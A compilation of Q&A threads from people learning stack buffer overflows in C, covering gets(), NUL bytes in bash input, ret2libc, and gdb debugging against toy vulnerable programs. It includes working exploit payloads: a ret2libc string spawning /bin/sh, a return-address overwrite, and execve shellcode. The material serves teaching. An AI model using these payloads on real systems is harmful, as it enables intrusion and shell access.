Does gets() ignore '\0'? - c

I am learning about buffer overrun with this source code:
#include <stdio.h>
int main()
{
char buf[16];
gets(buf);
printf("buf # %8p\n", (void*)&buf);
return 0;
}
I am trying to write null characters ('\0') into buf.
First, in gdb, I set a breakpoint at line 6, after the gets() call, and run the program with r <<< $(python -c 'print "\0"*11 + "AAAA"')
When I examine the stack, I see that only "AAAA" was written to buf. What is happening?
(gdb) x/16xw &buf
0xffffcf80: 0x41414141 0xffffd000 0xffffd04c 0x080484a1
0xffffcf90: 0xf7fb43dc 0xffffcfb0 0x00000000 0xf7e1a637
0xffffcfa0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffcfb0: 0x00000001 0xffffd044 0xffffd04c 0x00000000
But when I run the program with r <<< $(python -c 'print "\1"*11 + "AAAA"'), buf contains:
(gdb) x/16xw &buf
0xffffcf80: 0x01010101 0x01010101 0x41010101 0x00414141
0xffffcf90: 0xf7fb43dc 0xffffcfb0 0x00000000 0xf7e1a637
0xffffcfa0: 0xf7fb4000 0xf7fb4000 0x00000000 0xf7e1a637
0xffffcfb0: 0x00000001 0xffffd044 0xffffd04c 0x00000000
So does gets() fail to receive the null characters, or does stdin drop them?
P.S.: I built it with gcc -m32 -fno-stack-protector -g stack.c -o stack on gcc (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609.
Update: After some suggestions, I tried this:
#include <stdio.h>
int main()
{
char buf[16];
gets(buf);
printf("buf # %8p\n", (void*)&buf);
for (int i = 0; i < 16; ++i) // dump every byte of buf
{
printf("%02x ", buf[i]);
}
return 0;
}
It works with '\0'
$ gcc -g j_stack.c -o j_stack
$ python -c 'print "AAAA" + "\0"*6 + "AAAA"'| ./j_stack
buf # 0xffffcfbc
41 41 41 41 00 00 00 00 00 00 41 41 41 41 00 ffffffff
But how do I provide input containing '\0' to buf when running the program under gdb?

No, it doesn't.
This behaviour has nothing to do with gets(), or with Python strings; it is due to the way you are providing input to your program, using command substitution together with the Bash "herestring" syntax. Bash cannot hold NUL bytes in the result of a command substitution, so they are dropped before your program ever sees them:
# python -c 'print "\0"*11 + "AAAA"' | wc -c
16
# python -c 'print "\0"*11 + "AAAA"' | hexdump
0000000 0000 0000 0000 0000 0000 4100 4141 0a41
0000010
# cat <<< $(python -c 'print "\0"*11 + "AAAA"') | wc -c
5
# hexdump <<< $(python -c 'print "\0"*11 + "AAAA"')
0000000 4141 4141 000a
0000005
# echo $(python -c 'print "\0"*11 + "AAAA"') | wc -c
5
If you run your program with a simple pipe, you should see the results you expect:
python -c 'print "\0"*11 + "AAAA"' | ./myProgram

No, gets does not ignore '\0'.
I changed your program to include
for(i = 0; i < 16; i++) printf("%02x", buf[i]);
printf("\n");
after calling gets. I ran the program on the input
abc\n
and saw
61626300000000000000000000000000
as I expected. I then ran the program on the input
ab\0c\n
and saw
61620063000000000000000000000000
which was also what I expected.
P.S. I'm not sure why you saw the behavior you did, but I confess I'm not sure what you're doing with <<< and those python fragments. Me, I used
echo abc | a.out
and
echo 616200630a | unhex | a.out
where unhex is a little program I have in my bin directory for, well, doing the obvious.

Related

ROP Buffer Overflow Exercise Issues

I'm doing this buffer overflow exercise and I can't seem to get it to work...
In the Calling Arguments section of the article, the author exploits this program so that system() is called with the variable not_used instead of "/bin/date":
char* not_used = "/bin/sh";
void not_called() {
printf("Not quite a shell...\n");
system("/bin/date");
}
void vulnerable_function(char* string) {
char buffer[100];
strcpy(buffer, string);
}
int main(int argc, char** argv) {
vulnerable_function(argv[1]);
return 0;
}
He does this by finding the addresses of not_used and system@plt, then overwriting the stack with them:
| 0x8048580 <not_used> |
| 0x43434343 <fake return address> |
| 0x8048360 <address of system> |
| 0x42424242 <fake old %ebp> |
| 0x41414141 ... |
| ... (0x6c bytes of 'A's) |
| ... 0x41414141 |
However, when I tried to do this, I just get a Segmentation Fault:
frinto@kali:~/Documents/theclang/programs/rop/argrop$ gdb -q a.out
Reading symbols from a.out...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x122e
(gdb) run
Starting program: /home/frinto/Documents/theclang/programs/rop/argrop/a.out
Breakpoint 1, 0x5655622e in main ()
(gdb) print 'system@plt'
$1 = {<text variable, no debug info>} 0x56556050 <system@plt>
(gdb) x/s (int)not_used
0x56557008: "/bin/sh"
(gdb)
Then I built my payload and ran it:
frinto@kali:~/Documents/theclang/programs/rop/argrop$ ./a.out "$(python -c 'print "A"*0x6c + "BBBB" + "\x50\x60\x55\x56" + "CCCC" + "\x08\x70\x55\x56"')"
Segmentation fault
What could the issue be here? Thanks in advance for any help!
P.S. Memory randomization is disabled
If NX and ASLR are disabled, just do a ret2libc attack rather than directing execution to not_called().
I found the address of the /bin/sh string (the not_used variable) using IDA Pro:
String /bin/sh address = 0x08048530
system() address = 0xb7e36da0
Fake address = JUNK
Exploit:
`python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
PoC:
% ./vulnerable `python -c 'print "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+"\xa0\x6d\xe3\xb7"+"JUNK"+"\x30\x85\x04\x08"'`
$

How can I exploit a buffer overflow?

I have a homework assignment to exploit a buffer overflow in the given program.
#include <stdio.h>
#include <stdlib.h>
int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}
int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}
int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}
The professor wants us to exploit the gets() call. We are not supposed to modify the code in any way, only craft a malicious input that causes a buffer overflow. I've looked online but I am not sure how to go about doing this. I'm using gcc version 5.2.0 and Windows 10 version 1703. Any tips would be great!
Update:
I have looked up some tutorials and at least found the address for the hidden function I am trying to overflow into, but I am now stuck. I have been trying to run these commands:
gcc -g -o vuln -fno-stack-protector -m32 homework5.c
gdb ./vuln
disas main
break *0x00010880
run $(python -c "print('A'*256)")
x/200xb $esp
With that last command, gdb reports "Value can't be converted to integer." I tried replacing esp with rsp because I am on a 64-bit system, but I got the same result. Is there a workaround for this, or another way to find the address of buf?
Since buf is an array of 12 characters, any input of 12 or more characters overflows it, because gets() also appends a terminating NUL.
First, you need to find the offset at which the saved return address, and with it the instruction pointer (RIP on x86-64, EIP on 32-bit x86), gets overwritten.
gdb with PEDA is very useful for this:
$ gdb ./bof
...
gdb-peda$ pattern create 100 input
Writing pattern of 100 chars to filename "input"
...
gdb-peda$ r < input
Starting program: /tmp/bof < input
...
=> 0x4005c8 <goodFunctionUserInput+26>: ret
0x4005c9 <main>: push rbp
0x4005ca <main+1>: mov rbp,rsp
0x4005cd <main+4>: call 0x4005ae <goodFunctionUserInput>
0x4005d2 <main+9>: mov edi,0x40067c
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe288 ("(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0008| 0x7fffffffe290 ("A)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0016| 0x7fffffffe298 ("AA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0024| 0x7fffffffe2a0 ("bAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0032| 0x7fffffffe2a8 ("AcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0040| 0x7fffffffe2b0 ("AAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0048| 0x7fffffffe2b8 ("IAAeAA4AAJAAfAA5AAKAAgAA6AAL")
0056| 0x7fffffffe2c0 ("AJAAfAA5AAKAAgAA6AAL")
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00000000004005c8 in goodFunctionUserInput ()
gdb-peda$ patts
Registers contain pattern buffer:
R8+0 found at offset: 92
R9+0 found at offset: 56
RBP+0 found at offset: 16
Registers point to pattern buffer:
[RSP] --> offset 24 - size ~76
[RSI] --> offset 0 - size ~100
....
Now you can overwrite the saved return address: it sits at offset 24, which is where RSP points when ret executes. Since your homework only needs to print the "Gotcha!\n" string, just jump to the oopsIGotToTheBadFunction function.
Get the function address:
$ readelf -s bof
...
50: 0000000000400596 24 FUNC GLOBAL DEFAULT 13 oopsIGotToTheBadFunction
...
Build the exploit and run it:
[manu@debian /tmp]$ python -c 'print "A"*24+"\x96\x05\x40\x00\x00\x00\x00\x00"' > input
[manu@debian /tmp]$ ./bof < input
Gotcha!

GDB Debugging: Passing arguments using IO redirection

I am learning how to exploit a buffer overflow. Below is the program I am playing with:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[256];
printf("%p\n", buffer);
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
return 0;
}
I compile this program with: gcc -fno-stack-protector -z execstack program.c -o program
I loaded this program in gdb: gdb ./program
If I issue the following command: run $(python -c 'print "A" * 3000') it overwrites the registers as desired:
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffd938 0x7fffffffd938
r8 0x4141414141414141 0x4141414141414141
r9 0x4141414141414141 0x4141414141414141
r10 0x4141414141414141 0x4141414141414141
.....
But if I pass the input to the program using I/O redirection, the registers are not overwritten as desired.
fuzz.py
#!/usr/bin/python
print 'A' * 3000
I write the 'A's to a file f with fuzz.py > f
I start the program in gdb with gdb ./program
Now, if I pass the input to the program using I/O redirection, I get unexpected output:
run < f
I get the following error:
Stopped reason: SIGSEGV
__strcpy_sse2_unaligned ()
at ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S:296
296 ../sysdeps/x86_64/multiarch/strcpy-sse2-unaligned.S: No such file or directory.
Why am I getting this __strcpy_sse2_unaligned error, whereas if I pass the argument using run $(python -c 'print "A" * 3000') I only get the SIGSEGV I wanted?
info registers:
rbp 0x7fffffffe4f0 0x7fffffffe4f0
rsp 0x7fffffffe3d8 0x7fffffffe3d8
r8 0x0 0x0
r9 0xf 0xf
r10 0x5d 0x5d
Why are the registers not overwritten by 'A's?
Q1)
Why is passing arguments in gdb using:
run $(python -c 'print "A" * 3000')
and
run < f
not equal? f is the file which contains 3000 'A's.
Q2)
What is the meaning of this error: __strcpy_sse2_unaligned ()
You are taking input from command line arguments, not the standard input:
strcpy(buffer, argv[1]);
So you should use:
run $(python -c 'print "A" * 3000')
The < redirection would work if you're reading from stdin, for example with scanf.
The __strcpy_sse2_unaligned SIGSEGV is caused by strcpy reading from a null pointer: with run < f the program receives no arguments, so argc is 1 and argv[1] is argv[argc], which is guaranteed to be NULL. GDB then tries to show the source for that internal glibc function, but cannot find it.

Command line input to a C program (using 'print' command of Perl)

I am having difficulty understanding how Perl's print command interprets hexadecimal values. I am using a very simple program of just 8 lines to demonstrate my question. The following gdb session explains it in detail:
anil@anil-Inspiron-N5010:~/Desktop$ gcc -g code.c
anil@anil-Inspiron-N5010:~/Desktop$ gdb -q ./a.out
Reading symbols from ./a.out...done.
(gdb) list
1 #include <stdio.h>
2
3 int main(int argc, char* argv[])
4 {
5 int i;
6 for (i =0; i<argc; ++i)
7 printf ("%p\n", argv[i]);
8 return 0;
9 }
(gdb) break 8
Breakpoint 1 at 0x40057a: file code.c, line 8.
(gdb) run $(perl -e 'print "\xdd\xcc\xbb\xaa"') $(perl -e 'print "\xcc\xdd\xee\xff"')
Starting program: /home/anil/Desktop/a.out $(perl -e 'print "\xdd\xcc\xbb\xaa"') $(perl -e 'print "\xcc\xdd\xee\xff"')
0x7fffffffe35d
0x7fffffffe376
0x7fffffffe37b
Breakpoint 1, main (argc=3, argv=0x7fffffffdfe8) at code.c:8
8 return 0;
(gdb) x/2x argv[1]
0x7fffffffe376: 0xaabbccdd 0xeeddcc00
In the session above I used gdb to debug the program. I passed two command-line arguments (besides the name of the program itself): \xdd\xcc\xbb\xaa and \xcc\xdd\xee\xff. Owing to the little-endian architecture, I expected them to be displayed as 0xaabbccdd and 0xffeeddcc, but as the last line of the session shows, gdb prints 0xaabbccdd and 0xeeddcc00. Why is this so? What am I missing? This has happened with some other arguments too. Any help would be appreciated.
PS: 2^32 = 4294967296 and 0xffeeddcc = 4293844428 (2^32 > 0xffeeddcc). I don't know if still there is any connection.
Command-line arguments are NUL-terminated strings.
argv[1] is a pointer to the first character of a NUL-terminated string.
7FFFFFFFE376 DD CC BB AA 00
argv[2] is a pointer to the first character of a NUL-terminated string.
7FFFFFFFE37B CC DD EE FF 00
If you pay attention, you'll notice they happen to be located immediately one after the other in memory.
7FFFFFFFE376 DD CC BB AA 00 CC DD EE FF 00
You asked to print two (32-bit) integers starting at argv[1]
7FFFFFFFE376 DD CC BB AA 00 CC DD EE FF 00
----------- -----------
0xAABBCCDD 0xEEDDCC00
For x/2x to be correct, you would have needed to use
perl -e'print "\xdd\xcc\xbb\xaa\xcc\xdd\xee\xff"'
-or-
perl -e'print pack "i*", 0xaabbccdd, 0xffeeddcc'
For the arguments you passed, you need to use
(gdb) x argv[1]
0x3e080048cbd: 0xaabbccdd
(gdb) x argv[2]
0x3e080048cc2: 0xffeeddcc
You are confusing yourself by printing strings as numbers. On a little-endian architecture, the least significant byte of a multi-byte value is stored at the lowest address, so the four bytes dd cc bb aa in memory are displayed as the word 0xaabbccdd.
So let's take a look at the output of your debugger command:
(gdb) x/2x argv[1]
0x7fffffffe376: 0xaabbccdd 0xeeddcc00
Looking at that byte by byte, it would be:
0x7fffffffe376: dd
0x7fffffffe377: cc
0x7fffffffe378: bb
0x7fffffffe379: aa
0x7fffffffe37a: 00 # This NUL terminates argv[1]
0x7fffffffe37b: cc # This address corresponds to argv[2]
0x7fffffffe37c: dd
0x7fffffffe37d: ee
Which is not unexpected, no?
You might want to use something like this to display arguments in hex:
x/8bx argv[1]
(which will show 8 bytes in hexadecimal)

How to explain this buffer overflow vulnerability in C

Given this C program:
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv) {
char buf[1024];
strcpy(buf, argv[1]);
}
Built with:
gcc -m32 -z execstack prog.c -o prog
Given shell code:
EGG=$(printf '\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/df')
The program is exploitable with the commands:
./prog $EGG$(python -c 'print "A" * 991 + "\x87\x83\x04\x08"')
./prog $EGG$(python -c 'print "A" * 991 + "\x0f\x84\x04\x08"')
where I got the addresses from:
$ objdump -d prog | grep call.*eax
8048387: ff d0 call *%eax
804840f: ff d0 call *%eax
I understand the purpose of the 'A' padding in the middle; I calculated the 991 from the length of buf in the program and the length of $EGG.
What I don't understand is why any of these addresses with call *%eax trigger the execution of the shellcode copied to the beginning of buf. As far as I understand, I'm overwriting the return address with 0x8048387 (or the other one), what I don't understand is why this leads to jumping to the shellcode.
I got this far by reading Smashing the stack for fun and profit. But the article uses a different approach of guessing a relative address to jump to the shellcode. I'm puzzled as to why this simpler alternative works directly, without guesswork.
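strcpy returns its destination argument (buf in this case), and on 32-bit x86 that return value is passed back in register eax. So if nothing clobbers eax before main returns, eax still holds a pointer to your shellcode when the overwritten return address sends execution to call *%eax, which then jumps straight into buf.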

Resources